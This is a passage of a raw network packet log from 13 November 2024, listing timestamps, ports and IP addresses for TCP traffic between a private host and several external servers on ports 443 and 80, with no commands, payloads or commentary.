Nov 13, 2024 20:39:49.019157887 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.019237041 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.019784927 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.020504951 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.020514965 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.020947933 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.020978928 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.021096945 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.021536112 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.021589041 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.021635056 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.021646976 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.021753073 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.021806955 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.022094965 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.022110939 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.024991989 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.024997950 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.025096893 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.025146961 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.025199890 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.025217056 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.025276899 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.025327921 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.025418997 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.025439978 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.025490999 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.026191950 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.026201963 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.031441927 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.031739950 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.031879902 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.032671928 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.032696962 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.032737017 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.032752991 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.032779932 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.032798052 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.036076069 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.036092043 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.037225962 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.037252903 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.037326097 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.037333965 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.037344933 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.037431002 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.055068970 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.055097103 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.055619001 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.055624962 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.060159922 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.060170889 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.065798998 CET	443	49935	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.066052914 CET	49935	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.066066980 CET	443	49935	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.066360950 CET	443	49935	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.067372084 CET	49935	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.067420006 CET	443	49935	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.073363066 CET	443	49936	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.075088024 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.075100899 CET	443	49936	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.075990915 CET	443	49936	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.076061010 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.078732967 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.078774929 CET	443	49936	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.081358910 CET	443	49934	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.081665039 CET	49934	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.081676960 CET	443	49934	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.081990004 CET	443	49934	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.082446098 CET	49934	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.082499027 CET	443	49934	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.118316889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.118374109 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.118468046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.118478060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.118519068 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.118549109 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.118561029 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.118571997 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.118583918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.118608952 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.118626118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.119265079 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.119306087 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.121805906 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.121813059 CET	49935	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.121824980 CET	443	49936	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:49.137224913 CET	49934	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.147022009 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.147526026 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.147540092 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.148000956 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.148005009 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.158560038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158570051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158611059 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.158631086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158670902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158680916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158710003 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.158826113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158835888 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158852100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158864975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158874989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158891916 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.158910036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.158977032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158987999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.158998966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159019947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159046888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159143925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159171104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159182072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159207106 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159230947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159370899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159382105 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159394026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159435034 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159447908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159609079 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159617901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159658909 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159674883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159723997 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159734964 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159746885 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159768105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159782887 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.159925938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159936905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.159979105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.163785934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.163801908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.163842916 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.163862944 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.168771029 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:49.235378027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.235394955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.235404968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.235429049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.235441923 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.235462904 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.235471010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.235475063 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.235498905 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.235595942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.235608101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.235629082 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.235642910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.236217976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.236244917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.236255884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.236260891 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.236282110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.272912025 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.273334026 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.273380041 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.273783922 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.273792982 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.275837898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.275883913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.275891066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.275897026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.275912046 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.275927067 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.275986910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.275999069 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276019096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276036978 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276066065 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276072025 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276083946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276190996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276201963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276228905 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276357889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276396990 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276427031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276463032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276473999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276514053 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276542902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276701927 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276747942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276760101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276772022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276783943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276810884 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276834965 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.276874065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.276885986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.277056932 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.277169943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.277182102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.277194977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.277205944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.277209997 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.277225018 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.277257919 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.327656984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.327667952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.327708960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.338359118 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.340596914 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.340629101 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.341109037 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.341114998 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.352346897 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.352560997 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.352581024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.352593899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.352606058 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.352617979 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.352643967 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.352683067 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.353152037 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.353192091 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.353214025 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.353224993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.353236914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.353251934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.353269100 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.353718042 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.353724957 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.368174076 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.368244886 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.368395090 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.368432999 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.368433952 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.368453026 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.368463039 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.370948076 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.370987892 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.371064901 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.371309042 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.371331930 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.392841101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.392851114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.392904043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.392931938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.392944098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.392956018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.392967939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.392987967 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393008947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393449068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393486023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393500090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393512011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393531084 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393543959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393553972 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393556118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393568039 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393574953 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393583059 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393589020 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393603086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393616915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393697023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393716097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393727064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393744946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393754959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393758059 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393767118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393779993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393785000 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393794060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393799067 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393806934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393819094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.393825054 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.393857002 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.394295931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.394306898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.394319057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.394331932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.394359112 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.394373894 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.394565105 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.394604921 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.394617081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.394638062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.394665003 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.401586056 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.401663065 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.402439117 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.407361984 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.407382011 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.407397985 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.407403946 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.410043001 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.410093069 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.410157919 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.410288095 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.410303116 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.457112074 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.457959890 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.457982063 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.458445072 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.458456039 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.469496012 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.469517946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.469518900 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.469532967 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.469563961 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.469579935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.469592094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.469604969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.469608068 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.469609022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.469635010 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.469675064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.469675064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.469769955 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.469786882 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.469798088 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.469804049 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.470165014 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.470199108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.470258951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.470258951 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.470268965 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.470470905 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.472831011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.472840071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.472908020 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.473067999 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.473109961 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.475795031 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.475975037 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.475990057 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.510289907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510308981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510329008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510340929 CET	80	49873	185.215.113.206	192.168.2.5
